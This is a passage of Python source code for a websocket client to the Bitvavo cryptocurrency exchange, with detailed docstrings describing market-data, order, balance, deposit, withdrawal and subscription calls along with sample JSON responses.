def assets(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get all available assets, unless `options` is given a `symbol` key.
Then you will get a single asset, instead of a list of assets.
---
Examples:
* https://api.bitvavo.com/v2/assets
* https://api.bitvavo.com/v2/assets?symbol=BTC
* https://api.bitvavo.com/v2/assets?symbol=SHIB
* https://api.bitvavo.com/v2/assets?symbol=ADA
* https://api.bitvavo.com/v2/assets?symbol=EUR
---
Args:
```python
# pick one
options={} # returns all assets
options={"symbol": "BTC"} # returns a single asset (the one of Bitcoin)
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
[
{
"symbol": "BTC",
"name": "Bitcoin",
"decimals": 8,
"depositFee": "0",
"depositConfirmations": 10,
"depositStatus": "OK",
"withdrawalFee": "0.2",
"withdrawalMinAmount": "0.2",
"withdrawalStatus": "OK",
"networks": ["Mainnet"],
"message": ""
}
]
```
"""
self.callbacks["assets"] = callback
options["action"] = "getAssets"
self.doSend(self.ws, json.dumps(options))
def book(self, market: str, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get a book (with two lists: asks and bids, as they're called)
---
Examples:
* https://api.bitvavo.com/v2/BTC-EUR/book
* https://api.bitvavo.com/v2/SHIB-EUR/book?depth=10
* https://api.bitvavo.com/v2/ADA-EUR/book?depth=0
---
Args:
```python
market="ADA-EUR"
options={"depth": 3} # returns the best 3 asks and 3 bids
options={} # same as `{"depth": 0}`; returns all bids and asks for that book
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{
"market": "ADA-EUR",
"nonce": 10378032,
"bids": [["1.1908", "600"], ["1.1902", "4091.359809"], ["1.1898", "7563"]],
"asks": [["1.1917", "2382.166997"], ["1.1919", "440.7"], ["1.192", "600"]],
}
# Notice how each bid and ask is also a list
bid = ["1.1908", "600"] # the first bid from the bids list
price = bid[0] # the price for one coin/token
size = bid[1] # how many tokens are asked (or bidded, in this case)
result = price * size
assert result == 714.48 # EUR can be gained from this bid if it's sold (minus the fee)
```
"""
self.callbacks["book"] = callback
options["market"] = market
options["action"] = "getBook"
self.doSend(self.ws, json.dumps(options))
def publicTrades(self, market: str, options: anydict, callback: Callable[[Any], None]) -> None:
"""Publically available trades
---
Examples:
* https://api.bitvavo.com/v2/BTC-EUR/trades
* https://api.bitvavo.com/v2/SHIB-EUR/trades?limit=10
* https://api.bitvavo.com/v2/ADA-EUR/trades?tradeIdFrom=532f4d4d-f545-4a2d-a175-3d37919cb73c
* https://api.bitvavo.com/v2/NANO-EUR/trades
---
Args:
```python
market="NANO-EUR"
# note that any of these `options` are optional
# use `int(time.time() * 1000)` to get current timestamp in milliseconds
# or `int(datetime.datetime.now().timestamp()*1000)`
options={
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
"tradeIdFrom": "" # if you get a list and want everything AFTER a certain id, put that id here
"tradeIdTo": "" # if you get a list and want everything BEFORE a certain id, put that id here
}
callback=callback_example
```
---
Rate Limit Weight:
```python
5
```
---
Returns this to `callback`:
```python
[
{
"timestamp": 1542967486256,
"id": "57b1159b-6bf5-4cde-9e2c-6bd6a5678baf",
"amount": "0.1",
"price": "5012",
"side": "sell"
}
]
```
"""
self.callbacks["publicTrades"] = callback
options["market"] = market
options["action"] = "getTrades"
self.doSend(self.ws, json.dumps(options))
def candles(self, market: str, interval: str, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get up to 1440 candles for a market, with a specific interval (candle size)
Extra reading material: https://en.wikipedia.org/wiki/Candlestick_chart
## WARNING: RETURN TYPE IS WEIRD - CHECK BOTTOM OF THIS TEXT FOR EXPLANATION
---
Examples:
* https://api.bitvavo.com/v2/BTC-EUR/candles?interval=1h&limit=100
---
Args:
```python
market="BTC-EUR"
interval="1h" # Choose: 1m, 5m, 15m, 30m, 1h, 2h, 4h, 6h, 8h, 12h, 1d
# use `int(time.time() * 1000)` to get current timestamp in milliseconds
# or `int(datetime.datetime.now().timestamp()*1000)`
options={
"limit": [ 1 .. 1440 ], default 1440
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8640000000000000
}
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
[
# For whatever reason, you're getting a list of lists; no keys,
# so here is the explanation of what's what.
# timestamp, open, high, low, close, volume
[1640815200000, "41648", "41859", "41519", "41790", "12.1926685"],
[1640811600000, "41771", "41780", "41462", "41650", "13.90917427"],
[1640808000000, "41539", "42083", "41485", "41771", "14.39770267"],
[1640804400000, "41937", "41955", "41449", "41540", "23.64498292"],
[1640800800000, "41955", "42163", "41807", "41939", "10.40093845"],
]
```
"""
self.callbacks["candles"] = callback
options["market"] = market
options["interval"] = interval
options["action"] = "getCandles"
self.doSend(self.ws, json.dumps(options))
def tickerPrice(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get the current price for each market
---
Examples:
* https://api.bitvavo.com/v2/ticker/price
* https://api.bitvavo.com/v2/ticker/price?market=BTC-EUR
* https://api.bitvavo.com/v2/ticker/price?market=ADA-EUR
* https://api.bitvavo.com/v2/ticker/price?market=SHIB-EUR
* https://api.bitvavo.com/v2/ticker/price?market=DOGE-EUR
* https://api.bitvavo.com/v2/ticker/price?market=NANO-EUR
---
Args:
```python
options={}
options={"market": "BTC-EUR"}
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
# Note that `price` is unconverted
[
{"market": "1INCH-EUR", "price": "2.1594"},
{"market": "AAVE-EUR", "price": "214.42"},
{"market": "ADA-BTC", "price": "0.000021401"},
{"market": "ADA-EUR", "price": "1.2011"},
{"market": "ADX-EUR", "price": "0.50357"},
{"market": "AE-BTC", "price": "0.0000031334"},
{"market": "AE-EUR", "price": "0.064378"},
{"market": "AION-BTC", "price": "0.000004433"},
{"market": "AION-EUR", "price": "0.1258"},
{"market": "AKRO-EUR", "price": "0.020562"},
{"market": "ALGO-EUR", "price": "1.3942"},
# and another 210 markets below this point
]
```
"""
self.callbacks["tickerPrice"] = callback
options["action"] = "getTickerPrice"
self.doSend(self.ws, json.dumps(options))
def tickerBook(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get current bid/ask, bidsize/asksize per market
---
Examples:
* https://api.bitvavo.com/v2/ticker/book
* https://api.bitvavo.com/v2/ticker/book?market=BTC-EUR
* https://api.bitvavo.com/v2/ticker/book?market=ADA-EUR
* https://api.bitvavo.com/v2/ticker/book?market=SHIB-EUR
* https://api.bitvavo.com/v2/ticker/book?market=DOGE-EUR
* https://api.bitvavo.com/v2/ticker/book?market=NANO-EUR
---
Args:
```python
options={}
options={"market": "BTC-EUR"}
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
[
{"market": "1INCH-EUR", "bid": "2.1534", "ask": "2.1587", "bidSize": "194.8", "askSize": "194.8"},
{"market": "AAVE-EUR", "bid": "213.7", "ask": "214.05", "bidSize": "212.532", "askSize": "4.77676965"},
{"market": "ADA-EUR", "bid": "1.2", "ask": "1.2014", "bidSize": "415.627597", "askSize": "600"},
{"market": "ADX-EUR", "bid": "0.49896", "ask": "0.50076", "bidSize": "1262.38216882", "askSize": "700.1"},
{"market": "AION-EUR", "bid": "0.12531", "ask": "0.12578", "bidSize": "3345", "askSize": "10958.49228653"},
# and another 215 markets below this point
]
```
"""
self.callbacks["tickerBook"] = callback
options["action"] = "getTickerBook"
self.doSend(self.ws, json.dumps(options))
def ticker24h(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get current bid/ask, bidsize/asksize per market
---
Examples:
* https://api.bitvavo.com/v2/ticker/24h
* https://api.bitvavo.com/v2/ticker/24h?market=BTC-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=ADA-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=SHIB-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=DOGE-EUR
* https://api.bitvavo.com/v2/ticker/24h?market=NANO-EUR
---
Args:
```python
options={}
options={"market": "BTC-EUR"}
callback=callback_example
```
---
Rate Limit Weight:
```python
25 # if no market option is used
1 # if a market option is used
```
---
Returns this to `callback`:
```python
[
{
"market": "1INCH-EUR",
"open": "2.2722",
"high": "2.2967",
"low": "2.1258",
"last": "2.1552",
"volume": "92921.3792573",
"volumeQuote": "204118.95",
"bid": "2.1481",
"bidSize": "392.46514457",
"ask": "2.1513",
"askSize": "195.3",
"timestamp": 1640819573777
},
{
"market": "AAVE-EUR",
"open": "224.91",
"high": "228.89",
"low": "210.78",
"last": "213.83",
"volume": "5970.52391148",
"volumeQuote": "1307777.47",
"bid": "213.41",
"bidSize": "2.61115011",
"ask": "213.85",
"askSize": "1.864",
"timestamp": 1640819573285
},
# and then 219 more markets
]
```
"""
self.callbacks["ticker24h"] = callback
options["action"] = "getTicker24h"
self.doSend(self.ws, json.dumps(options))
def placeOrder(
self,
market: str,
side: str,
orderType: str,
body: anydict,
callback: Callable[[Any], None],
) -> None:
"""Place a new order on the exchange
---
Args:
```python
market="SHIB-EUR"
side="buy" # Choose: buy, sell
# For market orders either `amount` or `amountQuote` is required
orderType="market" # Choose: market, limit, stopLoss, stopLossLimit, takeProfit, takeProfitLimit
body={
"amount": "1.567",
"amountQuote": "5000",
# GTC orders will remain on the order book until they are filled or canceled.
# IOC orders will fill against existing orders, but will cancel any remaining amount after that.
# FOK orders will fill against existing orders in its entirety, or will be canceled (if the entire order cannot be filled).
"timeInForce": "GTC", # Choose: GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
# 'decrementAndCancel' decrements both orders by the amount that would have been filled, which in turn cancels the smaller of the two orders.
# 'cancelOldest' will cancel the entire older order and place the new order.
# 'cancelNewest' will cancel the order that is submitted.
# 'cancelBoth' will cancel both the current and the old order.
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"disableMarketProtection": false,
"responseRequired": true # setting this to `false` will return only an 'acknowledged', and be faster
}
# For limit orders `amount` and `price` are required.
orderType="limit" # Choose: market, limit, stopLoss, stopLossLimit, takeProfit, takeProfitLimit
body={
"amount": "1.567",
"price": "6000",
"timeInForce": "GTC", # GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"postOnly": false, # Only for limit orders
"responseRequired": True
}
orderType="stopLoss"
# or
orderType="takeProfit"
body={
"amount": "1.567",
"amountQuote": "5000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"timeInForce": "GTC", # GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"disableMarketProtection": false,
"responseRequired": true
}
orderType="stopLossLimit"
# or
orderType="takeProfitLimit"
body={
"amount": "1.567",
"price": "6000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"timeInForce": "GTC", # GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"postOnly": false, # Only for limit orders
"responseRequired": true
}
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": false,
"disableMarketProtection": true
}
```
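---
A minimal usage sketch (assuming `ws` is an instance of this websocket class; `callback_example` just prints whatever it receives):
```python
def callback_example(response):
    print(response)

# market buy of 50 EUR worth of BTC
ws.placeOrder("BTC-EUR", "buy", "market", {"amountQuote": "50"}, callback_example)

# limit sell of 0.001 BTC at 60000 EUR
ws.placeOrder("BTC-EUR", "sell", "limit", {"amount": "0.001", "price": "60000"}, callback_example)
```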
"""
self.callbacks["placeOrder"] = callback
body["market"] = market
body["side"] = side
body["orderType"] = orderType
body["action"] = "privateCreateOrder"
self.doSend(self.ws, json.dumps(body), True)
def updateOrder(self, market: str, orderId: str, body: anydict, callback: Callable[[Any], None]) -> None:
"""Update an existing order for a specific market. Make sure that at least one of the optional parameters is set,
otherwise nothing will be updated.
---
Args:
```python
market="BTC-EUR"
orderId="95d92d6c-ecf0-4960-a608-9953ef71652e"
body={
"amount": "1.567",
"amountRemaining": "1.567",
"price": "6000",
"triggerAmount": "4000", # only for stop orders
# GTC orders will remain on the order book until they are filled or canceled.
# IOC orders will fill against existing orders, but will cancel any remaining amount after that.
# FOK orders will fill against existing orders in its entirety, or will be canceled (if the entire order cannot be filled).
"timeInForce": "GTC", # Choose: GTC, IOC, FOK. Good-Til-Canceled (GTC), Immediate-Or-Cancel (IOC), Fill-Or-Kill (FOK)
# 'decrementAndCancel' decrements both orders by the amount that would have been filled, which in turn cancels the smaller of the two orders.
# 'cancelOldest' will cancel the entire older order and place the new order.
# 'cancelNewest' will cancel the order that is submitted.
# 'cancelBoth' will cancel both the current and the old order.
"selfTradePrevention": "decrementAndCancel", # decrementAndCancel, cancelOldest, cancelNewest, cancelBoth
"postOnly": false, # Only for limit orders
"responseRequired": true # setting this to `false` will return only an 'acknowledged', and be faster
}
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
```
"""
self.callbacks["updateOrder"] = callback
body["market"] = market
body["orderId"] = orderId
body["action"] = "privateUpdateOrder"
self.doSend(self.ws, json.dumps(body), True)
def cancelOrder(self, market: str, orderId: str, callback: Callable[[Any], None]) -> None:
"""Cancel an existing order for a specific market
---
Args:
```python
market="BTC-EUR"
orderId="a4a5d310-687c-486e-a3eb-1df832405ccd"
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{"orderId": "2e7ce7fc-44e2-4d80-a4a7-d079c4750b61"}
```
"""
self.callbacks["cancelOrder"] = callback
options = {
"action": "privateCancelOrder",
"market": market,
"orderId": orderId,
}
self.doSend(self.ws, json.dumps(options), True)
def getOrder(self, market: str, orderId: str, callback: Callable[[Any], None]) -> None:
"""Get an existing order for a specific market
---
Args:
```python
market="BTC-EUR"
orderId="ff403e21-e270-4584-bc9e-9c4b18461465"
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
```
"""
self.callbacks["getOrder"] = callback
options = {
"action": "privateGetOrder",
"market": market,
"orderId": orderId,
}
self.doSend(self.ws, json.dumps(options), True)
def getOrders(self, market: str, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get multiple existing orders for a specific market
---
Args:
```python
market="BTC-EUR"
options={
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
"tradeIdFrom": "" # if you get a list and want everything AFTER a certain id, put that id here
"tradeIdTo": "" # if you get a list and want everything BEFORE a certain id, put that id here
}
callback=callback_example
```
---
Rate Limit Weight:
```python
5
```
---
Returns this to `callback`:
```python
# A whole list of these
[
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
]
```
"""
self.callbacks["getOrders"] = callback
options["action"] = "privateGetOrders"
options["market"] = market
self.doSend(self.ws, json.dumps(options), True)
def cancelOrders(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Cancel all existing orders for a specific market (or account)
---
Args:
```python
options={} # WARNING - WILL REMOVE ALL OPEN ORDERS ON YOUR ACCOUNT!
options={"market":"BTC-EUR"} # Removes all open orders for this market
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
# A whole list of these
[
{"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6"}
]
```
"""
self.callbacks["cancelOrders"] = callback
options["action"] = "privateCancelOrders"
self.doSend(self.ws, json.dumps(options), True)
def ordersOpen(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get all open orders, either for all markets, or a single market
---
Args:
```python
options={} # Gets all open orders for all markets
options={"market":"BTC-EUR"} # Get open orders for this market
callback=callback_example
```
---
Rate Limit Weight:
```python
25 # if no market option is used
1 # if a market option is used
```
---
Returns this to `callback`:
```python
[
{
"orderId": "1be6d0df-d5dc-4b53-a250-3376f3b393e6",
"market": "BTC-EUR",
"created": 1542621155181,
"updated": 1542621155181,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "10",
"amountRemaining": "10",
"price": "7000",
"amountQuote": "5000",
"amountQuoteRemaining": "5000",
"onHold": "9109.61",
"onHoldCurrency": "BTC",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"filledAmount": "0",
"filledAmountQuote": "0",
"feePaid": "0",
"feeCurrency": "EUR",
"fills": [
{
"id": "371c6bd3-d06d-4573-9f15-18697cd210e5",
"timestamp": 1542967486256,
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
],
"selfTradePrevention": "decrementAndCancel",
"visible": true,
"timeInForce": "GTC",
"postOnly": true,
"disableMarketProtection": true
}
]
```
"""
self.callbacks["ordersOpen"] = callback
options["action"] = "privateGetOrdersOpen"
self.doSend(self.ws, json.dumps(options), True)
def trades(self, market: str, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get all historic trades from this account
---
Args:
```python
market="BTC-EUR"
options={
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
"tradeIdFrom": "" # if you get a list and want everything AFTER a certain id, put that id here
"tradeIdTo": "" # if you get a list and want everything BEFORE a certain id, put that id here
}
callback=callback_example
```
---
Rate Limit Weight:
```python
5
```
---
Returns this to `callback`:
```python
[
{
"id": "108c3633-0276-4480-a902-17a01829deae",
"orderId": "1d671998-3d44-4df4-965f-0d48bd129a1b",
"timestamp": 1542967486256,
"market": "BTC-EUR",
"side": "buy",
"amount": "0.005",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR",
"settled": true
}
]
```
"""
self.callbacks["trades"] = callback
options["action"] = "privateGetTrades"
options["market"] = market
self.doSend(self.ws, json.dumps(options), True)
def account(self, callback: Callable[[Any], None]) -> None:
"""Get all fees for this account
---
Args:
```python
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{
"fees": {
"taker": "0.0025",
"maker": "0.0015",
"volume": "10000.00"
}
}
```
"""
self.callbacks["account"] = callback
self.doSend(self.ws, json.dumps({"action": "privateGetAccount"}), True)
def balance(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get the balance for this account
---
Args:
```python
options={} # return all balances
options={symbol="BTC"} # return a single balance
callback=callback_example
```
---
Rate Limit Weight:
```python
5
```
---
Returns this to `callback`:
```python
[
{
"symbol": "BTC",
"available": "1.57593193",
"inOrder": "0.74832374"
}
]
```
"""
options["action"] = "privateGetBalance"
self.callbacks["balance"] = callback
self.doSend(self.ws, json.dumps(options), True)
def depositAssets(self, symbol: str, callback: Callable[[Any], None]) -> None:
"""Get the deposit address (with paymentId for some assets) or bank account information to increase your balance
---
Args:
```python
symbol="BTC"
symbol="SHIB"
symbol="EUR"
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{
"address": "CryptoCurrencyAddress",
"paymentId": "10002653"
}
# or
{
"iban": "NL32BUNQ2291234129",
"bic": "BUNQNL2A",
"description": "254D20CC94"
}
```
"""
self.callbacks["depositAssets"] = callback
self.doSend(
self.ws,
json.dumps({"action": "privateDepositAssets", "symbol": symbol}),
True,
)
def depositHistory(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get the deposit history of the account
Even when you filter on a single `symbol`, you'll still receive a list (which may contain multiple deposits).
---
Args:
```python
options={
"symbol":"EUR"
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
}
callback=callback_example
```
---
Rate Limit Weight:
```python
5
```
---
Returns this to `callback`:
```python
[
{
"timestamp": 1542967486256,
"symbol": "BTC",
"amount": "0.99994",
"address": "BitcoinAddress",
"paymentId": "10002653",
"txId": "927b3ea50c5bb52c6854152d305dfa1e27fc01d10464cf10825d96d69d235eb3",
"fee": "0"
}
]
# or
[
{
"timestamp": 1542967486256,
"symbol": "BTC",
"amount": "500",
"address": "NL32BITV0001234567",
"fee": "0"
}
]
```
"""
self.callbacks["depositHistory"] = callback
options["action"] = "privateGetDepositHistory"
self.doSend(self.ws, json.dumps(options), True)
def withdrawAssets(
self,
symbol: str,
amount: str,
address: str,
body: anydict,
callback: Callable[[Any], None],
) -> None:
"""Withdraw a coin/token to an external crypto address or bank account.
---
Args:
```python
symbol="SHIB"
amount="10"
address="BitcoinAddress" # Wallet address or IBAN
body={
"paymentId": "10002653", # For digital assets only. Should be set when withdrawing straight to another exchange or merchants that require payment id's.
"internal": false, # For digital assets only. Should be set to true if the withdrawal must be sent to another Bitvavo user internally
"addWithdrawalFee": false # If set to true, the fee will be added on top of the requested amount, otherwise the fee is part of the requested amount and subtracted from the withdrawal.
}
callback=callback_example
```
---
Rate Limit Weight:
```python
1
```
---
Returns this to `callback`:
```python
{
"success": true,
"symbol": "BTC",
"amount": "1.5"
}
```
"""
self.callbacks["withdrawAssets"] = callback
body["action"] = "privateWithdrawAssets"
body["symbol"] = symbol
body["amount"] = amount
body["address"] = address
self.doSend(self.ws, json.dumps(body), True)
def withdrawalHistory(self, options: anydict, callback: Callable[[Any], None]) -> None:
"""Get the withdrawal history
---
Args:
```python
options={
"symbol":"SHIB"
"limit": [ 1 .. 1000 ], default 500
"start": int timestamp in ms >= 0
"end": int timestamp in ms <= 8_640_000_000_000_000 # (that's somewhere in the year 2243, or near the number 2^52)
}
callback=callback_example
```
---
Rate Limit Weight:
```python
5
```
---
Returns this to `callback`:
```python
[
{
"timestamp": 1542967486256,
"symbol": "BTC",
"amount": "0.99994",
"address": "BitcoinAddress",
"paymentId": "10002653",
"txId": "927b3ea50c5bb52c6854152d305dfa1e27fc01d10464cf10825d96d69d235eb3",
"fee": "0.00006",
"status": "awaiting_processing"
}
]
```
"""
self.callbacks["withdrawalHistory"] = callback
options["action"] = "privateGetWithdrawalHistory"
self.doSend(self.ws, json.dumps(options), True)
def subscriptionTicker(self, market: str, callback: Callable[[Any], None]) -> None:
# TODO(NostraDavid) one possible improvement here is to turn `market` into a list of markets, so we can sub to all of them at once. Same goes for other `subscription*()`
"""Subscribe to the ticker channel, which means `callback` gets passed the new best bid or ask whenever they change (server-side).
---
Args:
```python
market="BTC-EUR"
callback=callback_example
```
---
Returns this to `callback`:
```python
# first
{
"event": "subscribed",
"subscriptions": {
"ticker": [
"BTC-EUR"
]
}
}
# and after that:
{
"event": "ticker",
"market": "BTC-EUR",
"bestBid": "9156.8",
"bestBidSize": "0.12840531",
"bestAsk": "9157.9",
"bestAskSize": "0.1286605",
"lastPrice": "9156.9"
}
```
"""
if "subscriptionTicker" not in self.callbacks:
self.callbacks["subscriptionTicker"] = {}
self.callbacks["subscriptionTicker"][market] = callback
self.doSend(
self.ws,
json.dumps(
{
"action": "subscribe",
"channels": [{"name": "ticker", "markets": [market]}],
},
),
)
def subscriptionTicker24h(self, market: str, callback: Callable[[Any], None]) -> None:
"""Subscribe to the ticker-24-hour channel, which means `callback` gets passed the new object every second, if values have changed.
---
Args:
```python
market="BTC-EUR"
callback=callback_example
```
---
Returns this to `callback`:
```python
# first
{
"event": "subscribed",
"subscriptions": {
"ticker": [
"BTC-EUR"
]
}
}
# and after that:
{
"event": "ticker24h",
"data": {
"market": "BTC-EUR",
"open": "9072.9",
"high": "9263.6",
"low": "9062.8",
"last": "9231.8",
"volume": "85.70530211",
"volumeQuote": "785714.14",
"bid": "9225",
"bidSize": "1.14732373",
"ask": "9225.1",
"askSize": "0.65371786",
"timestamp": 1566564813057
}
}
```
"""
if "subscriptionTicker24h" not in self.callbacks:
self.callbacks["subscriptionTicker24h"] = {}
self.callbacks["subscriptionTicker24h"][market] = callback
self.doSend(
self.ws,
json.dumps(
{
"action": "subscribe",
"channels": [{"name": "ticker24h", "markets": [market]}],
},
),
)
def subscriptionAccount(self, market: str, callback: Callable[[Any], None]) -> None:
"""Subscribes to the account channel, which sends an update whenever an event happens which is related to the account.
These are 'order' events (create, update, cancel) or 'fill' events (a trade occurred).
---
Args:
```python
market="BTC-EUR"
callback=callback_example
```
---
Returns this to `callback`:
```python
# first
{
"event": "subscribed",
"subscriptions": {
"account": [
"BTC-EUR"
]
}
}
# and after that, either
{
"event": "order",
"orderId": "80b5f04d-21fc-4ebe-9c5f-6d34f78ee477",
"market": "BTC-EUR",
"created": 1548684420771,
"updated": 1548684420771,
"status": "new",
"side": "buy",
"orderType": "limit",
"amount": "1",
"amountRemaining": "0.567",
"price": "9225.1",
"onHold": "9225.1",
"onHoldCurrency": "EUR",
"triggerPrice": "4000",
"triggerAmount": "4000",
"triggerType": "price",
"triggerReference": "lastTrade",
"timeInForce": "GTC",
"postOnly": false,
"selfTradePrevention": "decrementAndCancel",
"visible": true
}
# or
{
"event": "fill",
"market": "BTC-EUR",
"orderId": "80b5f04d-21fc-4ebe-9c5f-6d34f78ee477",
"fillId": "15d14b09-389d-4f83-9413-de9d0d8e7715",
"timestamp": 1542967486256,
"amount": "0.005",
"side": "sell",
"price": "5000.1",
"taker": true,
"fee": "0.03",
"feeCurrency": "EUR"
}
```
"""
if "subscriptionAccount" not in self.callbacks:
self.callbacks["subscriptionAccount"] = {}
self.callbacks["subscriptionAccount"][market] = callback
self.doSend(
self.ws,
json.dumps(
{
"action": "subscribe",
"channels": [{"name": "account", "markets": [market]}],
},
),
True,
)
def subscriptionCandles(self, market: str, interval: str, callback: Callable[[Any], None]) -> None:
"""Subscribes to candles and returns a candle each time a new one is formed, depending on the interval
---
Args:
```python
market="BTC-EUR"
